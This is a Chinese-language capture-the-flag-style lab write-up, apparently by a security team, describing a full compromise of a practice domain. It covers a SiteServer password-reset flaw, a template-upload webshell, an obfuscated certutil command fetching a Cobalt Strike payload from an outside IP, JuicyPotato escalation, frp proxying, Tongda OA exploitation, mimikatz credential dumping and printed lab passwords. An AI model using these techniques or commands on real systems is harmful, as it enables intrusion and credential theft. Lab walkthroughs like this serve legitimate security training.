先说结论

这套环境刚开始大体看了下以为比较有难度,没想到拿下域内OA办公机时直接把域管密码dump下来了,感觉属实草率了。。。不过整体来说还是可以的,对于在实战中遇到域控不多的铁子可以拿来练练手熟悉环境,最后感谢作者提供的靶场环境,大佬辛苦了!

信息收集

已知靶标URL为http://www.moonlab.com/

(搭建环境访问时需要绑定hosts),直接访问域名没啥东西


查看robots.txt

siteserver管理员密码找回

siteserver之前爆出过管理员密码找回功能存在缺陷,详情见此

使用密码找回功能

http://www.moonlab.com/siteserver/forgetPassword.aspx


火狐禁用JS,Firefox地址栏
about:config
搜索框中输入JavaScript,找到javascript.enabled将其转换为false


回到找回密码页面,一直点下一步

后台getshell

siteserver后台getshell方法很多,详情

这里使用模板文件上传拿shell。

在’系统管理’–’站点模版管理’–’导入站点模版’,


使用csroad大佬的webshell免杀生成器生成ashx CMD马,压缩为rar上传到目标模版里,然后访问即可获取webshell


tasklist可以看到有安全狗

上线cs,本机信息收集,搭代理

使用免杀语句将cs木马下载到靶机
c""""e""""r""""t""""u""""t""""i""""l.exe -urlcache -split -f http://23.234.209.205:8000/6666.exe 6666.exe

查看权限,梼杌插件JuicyPotato (ms16-075)提权至system


查看是否开启3389
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnectionsshell tasklist /svc | findstr "TermService"shell netstat -ano | findstr "992"

双网卡机器


读管理员密码 administrator [email protected]#QWE123


上frp搭代理(已经读出管理员密码,确认开启3389,故忽略此步骤接下来直接在虚拟机内靶机上操作,否则太卡。。。)
shellfrpc.exe-csocks5.ini

内网横向

fscan探测内网信息,发现1.130机器存在通达OA

直接梭哈拿shell


system权限带360、不出网,双网卡存在10.10.10.段,2012操作系统





正向连接上线CS,首先生成监听器beacon-tcp,监听在17775端口


然后CS生成一个stageless木马,选定刚才的新监听器


connect 10.10.1.130 17775


可以看到是域内机器,而且有域控进程



mimikatzs抓取logonpasswords

获取本机administrator密码[email protected]#Q123,域内用户OA密码[email protected]#Qz123,域控administrator密码tide123…







域控

定位域控IP10.10.10.165


nmap扫全端口,3389已开
直接远程桌面登录
flag.txt
E
N
D
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。
团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室,近三年来在网络安全技术方面开展研发项目60余项,获得各类自主知识产权30余项,省市级科技项目立项20余项,研究成果应用于产品核心技术研究、国家重点科技项目攻关、专业安全服务等。对安全感兴趣的小伙伴可以加入或关注我们。

继续阅读
阅读原文